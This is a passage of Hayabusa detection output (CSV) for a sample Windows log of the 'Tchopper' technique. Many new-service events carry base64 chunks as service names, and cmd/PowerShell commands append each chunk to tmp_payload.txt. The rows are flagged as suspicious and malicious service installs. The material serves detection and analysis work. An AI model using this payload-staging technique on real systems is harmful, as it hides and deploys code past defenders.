tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:48.360 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:55.604 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 